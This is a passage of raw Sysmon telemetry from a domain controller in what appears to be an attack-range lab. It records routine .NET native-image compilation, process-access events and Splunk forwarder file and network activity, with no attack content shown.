indows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021991Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:19.609{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A24B-60D3-C704-00000000CF01}2312C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021990Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:19.609{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A24B-60D3-C704-00000000CF01}2312C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000021989Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:19.578{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=165805A1DF0B273FC439CD667FFAA32F,SHA256=5FC580923835745A1C5B28288789E0442F0E032628F85F8047A2A01BCC04EA66,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021988Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:19.546{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A24B-60D3-C604-00000000CF01}5300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021987Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:19.531{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A24B-60D3-C604-00000000CF01}5300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021986Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:19.531{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A24B-60D3-C604-00000000CF01}5300C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021985Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:19.437{4DB9351A-A24A-60D3-C504-00000000CF01}500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1f4-0\System.ServiceModel.Web.dll2021-06-23 21:06:19.437 10341000x800000000000000022001Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:20.812{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A24C-60D3-C904-00000000CF01}6668C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022000Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:20.796{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A24C-60D3-C904-00000000CF01}6668C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021999Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:20.796{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A24C-60D3-C904-00000000CF01}6668C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000021998Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:20.671{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6EF222D65ACF50BCB907F9414EF8EE8E,SHA256=DBAF13270EA99A851A8C5E1DFE189666C1307996F147B5E56D0408B6E454BD13,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021997Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:20.546{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A24C-60D3-C804-00000000CF01}4280C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021996Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:20.531{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A24C-60D3-C804-00000000CF01}4280C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021995Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:20.531{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A24C-60D3-C804-00000000CF01}4280C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021994Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:20.406{4DB9351A-A24B-60D3-C704-00000000CF01}2312C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\908-0\System.Speech.dll2021-06-23 21:06:20.406 23542300x800000000000000021993Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:19.999{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F123227C688E3F78CC93EE604354F791,SHA256=D54313F18DEE6E1658045F070DFE53FA660AF3FA34D61BA383FAEF8401BE90C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022003Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:21.968{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CFA92A4F6E910A6028AF4A9548C88B5B,SHA256=3A0370BCD828F0E22588B447EF6C1E8E69F1C78E8F84029A1339A69C44A406D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022002Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:20.999{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D74C580B7A9F9A09D6096DF453FEF74,SHA256=DFE23ECEC6516BCDAE34B734229D72CB40E0BDA4B8CFB6073A538ECAD0B37C38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022004Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:22.109{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26CEF7CCA0D6D2FDFFDCBB72CA03F232,SHA256=54F55FA60B234629F13019DBFBA01BB2E148654E9FDB9DC072A1CEC817DF2AA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022006Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:23.140{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C91DF8FF6F4D6CB78F4046AD0BD3355,SHA256=D29D9C3F71FE6B786E35FED9CBF44BDA1741D7456CD5E954BCA71370E90B1BB9,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000022005Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:21.210{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61450-false10.0.1.12-8000- 23542300x800000000000000022007Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:24.187{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE3DF259ECCFC419D85AE8B475AE1994,SHA256=BB0ED9D1E72D8C2DD1FCD0A88A73D8673C9C92D4E06D2C92316FAD85A639ADC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022008Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:25.187{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DB3EF0A1FFA6DE319E376F3BD7538C4,SHA256=9B0AB84985B0C881B7173F58AB2A83CD0B609CFCD0FC579C975BBF729B0733F7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000022011Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 
21:06:26.624{4DB9351A-A24C-60D3-C904-00000000CF01}6668C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1a0c-0\System.Web.dll2021-06-23 21:06:26.624 23542300x800000000000000022010Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:26.203{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=733EB766B16E5408E4DCDAA5E06BA13C,SHA256=265C4C7872FD776C98310ECEB291B06578E4C3D5D99EB3A2F6F42C9811F36ADA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022009Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:26.156{4DB9351A-9DDD-60D3-1200-00000000CF01}416NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=ECEE81551E45E38B40BA578924FA1F6B,SHA256=178A2C9E2648257BCF122F7DA6F6B1AC163ADD0AD79F5EA853A284F85236B286,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022032Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:27.984{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A253-60D3-CF04-00000000CF01}1040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022031Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:27.968{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A253-60D3-CF04-00000000CF01}1040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022030Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:27.968{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A253-60D3-CF04-00000000CF01}1040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022029Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:27.859{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A253-60D3-CE04-00000000CF01}6652C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022028Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:27.843{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A253-60D3-CE04-00000000CF01}6652C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022027Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:27.843{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A253-60D3-CE04-00000000CF01}6652C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 